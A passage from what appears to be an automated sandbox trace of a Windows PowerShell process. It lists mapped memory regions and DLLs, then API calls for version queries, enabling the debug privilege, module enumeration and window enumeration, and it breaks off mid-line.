"c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 620 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 621 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 622 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x76960000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 623 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 624 start_va = 0x46d0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 625 start_va = 0x46e0000 end_va = 0x46e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 626 start_va = 0x606c0000 end_va = 0x6071afff entry_point = 0x606c0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 627 start_va = 0x46f0000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 628 start_va = 0x4700000 end_va = 0x470ffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 642 start_va = 0x4710000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 643 start_va = 0x4780000 end_va = 0x510ffff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 644 start_va = 0x60130000 end_va = 0x60220fff entry_point = 0x60130000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\bc09ad2d49d8535371845cd7532f9271\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuration\\bc09ad2d49d8535371845cd7532f9271\\system.configuration.ni.dll") Region: id = 645 start_va = 0x7ff50000 end_va = 0x7ff5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 646 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 647 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 648 start_va = 0x4720000 end_va = 0x472ffff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 649 start_va = 0x72be0000 end_va = 0x72bf4fff entry_point = 0x72be0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 650 start_va = 0x72c00000 end_va = 0x72c51fff entry_point = 0x72c00000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 651 start_va = 0x733b0000 end_va = 0x733bcfff entry_point = 0x733b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 652 start_va = 0x74e30000 end_va = 0x74e6bfff entry_point = 0x74e30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 653 start_va = 0x5110000 end_va = 0x51dffff entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 654 start_va = 0x749d0000 end_va = 0x749d4fff entry_point = 0x749d0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 655 start_va = 0x75270000 end_va = 0x75275fff entry_point = 0x75270000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 656 start_va = 0x4730000 end_va = 0x474ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004730000" filename = "" Region: id = 657 start_va = 0x5340000 end_va = 0x537ffff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 658 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 659 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 660 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 661 start_va = 0x740f0000 end_va = 0x7410bfff entry_point = 0x740f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 662 start_va = 0x740e0000 end_va = 0x740e6fff entry_point = 0x740e0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 663 start_va = 0x73ff0000 end_va = 0x73ffcfff entry_point = 0x73ff0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 664 start_va = 0x5130000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 665 start_va = 0x51a0000 end_va = 0x51dffff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 666 start_va = 0x73f80000 end_va = 0x73f91fff entry_point = 0x73f80000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 667 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 668 start_va = 0x74f70000 end_va = 0x74f77fff entry_point = 0x74f70000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 693 start_va = 0x51e0000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 694 start_va = 0x74d00000 end_va = 0x74d43fff entry_point = 0x74d00000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 695 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 696 start_va = 0x5220000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 697 start_va = 0x6f800000 end_va = 0x6f805fff entry_point = 0x6f800000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 698 start_va = 0x5380000 end_va = 0x547ffff entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 699 start_va = 0x4750000 end_va = 0x4750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004750000" filename = "" Region: id = 700 start_va = 0x5290000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 701 start_va = 0x52d0000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 702 start_va = 0x5e3a0000 end_va = 0x5e42cfff entry_point = 0x5e3a0000 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll") Thread: id = 15 os_tid = 0xa54 [0022.361] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0022.655] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0022.655] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0022.656] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0022.656] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0023.505] GetVersionExW (in: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0023.505] GetLastError () returned 0x2 [0023.506] GetVersionExW (in: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0023.506] GetLastError () returned 0x2 [0023.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce3fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0023.511] GetLastError () returned 0x2 [0023.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce418, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0023.516] GetLastError () returned 0x2 [0023.516] GetVersionExW (in: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0023.516] GetLastError () returned 0x2 [0023.517] SetErrorMode (uMode=0x1) returned 0x1 [0023.518] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ce898 | out: lpFileInformation=0x1ce898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0023.518] GetLastError () returned 0x2 [0023.518] SetErrorMode (uMode=0x1) returned 0x1 [0023.522] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce91c | out: lpdwHandle=0x1ce91c) returned 0x94c [0023.524] GetLastError () returned 0x0 [0023.525] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1df4fc8 | out: lpData=0x1df4fc8) returned 1 [0023.528] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce8e8, puLen=0x1ce8e4 | out: lplpBuffer=0x1ce8e8*=0x1df5064, puLen=0x1ce8e4) returned 1 [0023.530] lstrlenW (lpString="䅁") returned 1 [0023.537] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df5140, puLen=0x1ce860) returned 1 [0023.537] lstrlenW (lpString="Microsoft Corporation") returned 21 [0023.538] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0023.538] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df5194, puLen=0x1ce860) returned 1 [0023.538] lstrlenW (lpString="System.Management.Automation") returned 28 [0023.538] lstrcpyW (in: lpString1=0x2b64c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0023.539] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df51f0, puLen=0x1ce860) returned 1 [0023.539] lstrlenW (lpString="6.1.7601.17514") returned 14 [0023.539] lstrcpyW (in: lpString1=0x2b64c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0023.539] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df5230, puLen=0x1ce860) returned 1 [0023.539] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0023.539] lstrcpyW (in: lpString1=0x2b64c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0023.539] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df5298, puLen=0x1ce860) returned 1 [0023.539] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0023.539] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0023.539] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df5334, puLen=0x1ce860) returned 1 [0023.539] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0023.539] lstrcpyW (in: lpString1=0x2b64c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0023.539] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df5398, puLen=0x1ce860) returned 1 [0023.539] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0023.539] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0023.539] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df5414, puLen=0x1ce860) returned 1 [0023.540] lstrlenW (lpString="6.1.7601.17514") returned 14 [0023.540] lstrcpyW (in: lpString1=0x2b64c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0023.540] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x1df50bc, puLen=0x1ce860) returned 1 [0023.540] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0023.540] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0023.540] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x0, puLen=0x1ce860) returned 0 [0023.540] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x0, puLen=0x1ce860) returned 0 [0023.540] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ce864, puLen=0x1ce860 | out: lplpBuffer=0x1ce864*=0x0, puLen=0x1ce860) returned 0 [0023.540] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce858, puLen=0x1ce854 | out: lplpBuffer=0x1ce858*=0x1df5064, puLen=0x1ce854) returned 1 [0023.542] VerLanguageNameW (in: wLang=0x0, szLang=0x2b64c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0023.545] VerQueryValueW (in: pBlock=0x1df4fc8, lpSubBlock="\\", lplpBuffer=0x1ce86c, puLen=0x1ce868 | out: lplpBuffer=0x1ce86c*=0x1df4ff0, puLen=0x1ce868) returned 1 [0023.552] GetCurrentProcessId () returned 0xa50 [0023.573] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ce0a4 | out: lpLuid=0x1ce0a4*(LowPart=0x14, HighPart=0)) returned 1 [0023.574] GetLastError () returned 0x0 [0023.575] GetCurrentProcess () returned 0xffffffff [0023.575] GetLastError () returned 0x0 [0023.576] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x1ce0a0 | out: TokenHandle=0x1ce0a0*=0x2e0) returned 1 [0023.576] GetLastError () returned 0x0 [0023.578] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x1df7b08*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0023.578] GetLastError () returned 0x514 [0023.580] CloseHandle (hObject=0x2e0) returned 1 [0023.580] GetLastError () returned 0x514 [0023.585] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa50) returned 0x2e0 [0023.585] GetLastError () returned 0x514 [0023.595] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x1df7b4c, cb=0x100, lpcbNeeded=0x1ce894 | out: lphModule=0x1df7b4c, lpcbNeeded=0x1ce894) returned 1 [0023.595] GetLastError () returned 0x514 [0023.598] GetModuleInformation (in: hProcess=0x2e0, hModule=0x22250000, lpmodinfo=0x1df7c8c, cb=0xc | out: lpmodinfo=0x1df7c8c*(lpBaseOfDll=0x22250000, SizeOfImage=0x72000, EntryPoint=0x22257363)) returned 1 [0023.599] GetLastError () returned 0x514 [0023.601] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x22250000, lpBaseName=0x2b6c80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0023.601] GetLastError () returned 0x514 [0023.602] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x22250000, lpFilename=0x2b6c80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0023.602] GetLastError () returned 0x514 [0023.603] CloseHandle (hObject=0x2e0) returned 1 [0023.603] GetLastError () returned 0x514 [0023.606] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa50) returned 0x2e0 [0023.606] GetLastError () returned 0x514 [0023.608] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x1df713c | out: lpExitCode=0x1df713c*=0x103) returned 1 [0023.608] GetLastError () returned 0x514 [0023.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2df5278, Length=0x20000, ResultLength=0x1ce8dc | out: SystemInformation=0x2df5278, ResultLength=0x1ce8dc*=0xa670) returned 0x0 [0023.634] EnumWindows (lpEnumFunc=0x1633612, lParam=0x0) returned 1 [0023.637] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x630 [0023.637] GetLastError () returned 0x514 [0023.637] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x4f8 [0023.637] GetLastError () returned 0x514 [0023.637] GetWindowThreadProcessId (in: hWnd=0x200aa, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.637] GetLastError () returned 0x514 [0023.637] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.637] GetLastError () returned 0x514 [0023.637] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.637] GetLastError () returned 0x514 [0023.637] GetWindowThreadProcessId (in: hWnd=0x200c4, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.638] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.638] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.639] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x61c [0023.639] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x5007c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.639] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.639] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.639] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x201ea, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.639] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x201cc, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.639] GetLastError () returned 0x514 [0023.639] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x9b8 [0023.639] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x8b8 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x8a4 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x890 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x880 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x870 [0023.640] GetLastError () returned 0x514 [0023.640] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x860 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x850 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x840 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x830 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x820 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x810 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x60140, 